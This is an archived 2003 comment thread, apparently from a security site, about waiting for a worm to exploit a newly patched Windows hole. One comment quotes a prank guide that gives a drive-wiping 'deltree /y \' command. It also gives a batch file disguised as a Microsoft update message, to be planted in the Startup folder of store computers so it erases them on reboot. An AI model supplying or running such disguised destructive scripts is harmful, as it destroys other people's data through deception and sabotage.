, 2003-07-21
The hole's been announced, the patch has been released. Now there's nothing to do but wait for the worm to come and wreak its ugly havoc.
Expand all |
Post comment
Waiting for the Worms
2003-07-21
By bet is eEye will still get to name it (1 replies)
By bet is eEye will still get to name it (1 replies)
Waiting for the Naming
2003-07-21
Rick Deckard (1 replies)
Rick Deckard (1 replies)
Waiting for the Naming
2003-07-21
Anonymous (2 replies)
Anonymous (2 replies)
Waiting for the Concert
2003-07-22
Anonymous (1 replies)
Anonymous (1 replies)

The worms to date have really been kind. Almost makes you believe they were released by someone who secretly cares. Else why would we all still have functional networks (and jobs :).
Management: "We have given you 3 security people, why is our network (of 40k machines) still at risk?"
"Windows 95/98 will refuse to format a drive if there are open files on it.
Format (with or without /autotest) will fail, giving a stupid error message
or something.
The correct way of cleaning your hard drive is "DELTREE /Y \ >NUL"
DELTREE is dos 6.2 command, to delete entire directory, along with
subdirectories. The /Y option skips confirmation. The \ tells it to delete
everything starting the root directory. It also will delete the files in
the root directory. The final >NUL is optional, it hides the output.
Otherwise Deltree outputs messages like "Deleting blah blah directory .. "
When deltree encounters open files, it just skips them and goes on with the
rest! Hehehe! Deltree also deletes hidden or system files.
If you use Deltree with the above options while Windows 95/98 is running,
you will get really neat effect... all the icons and files and desktop
images will all disapear, eventually you will be left with nothing on the
screen.
Go to a computer store, and using notepad or something, create file
"C:\WINDOWS\STARTM~1\STARTUP\INIT.BAT" and put in it:
>>
@echo Please wait while Microsoft Windows updates your files...
@echo (this may take a few minutes)
@deltree /y \ >nul
>>
and choose reboot as you are leaving the store."
[ reply ]
Link to this comment: http://www.securityfocus.com/comments/columns/174/20989#20989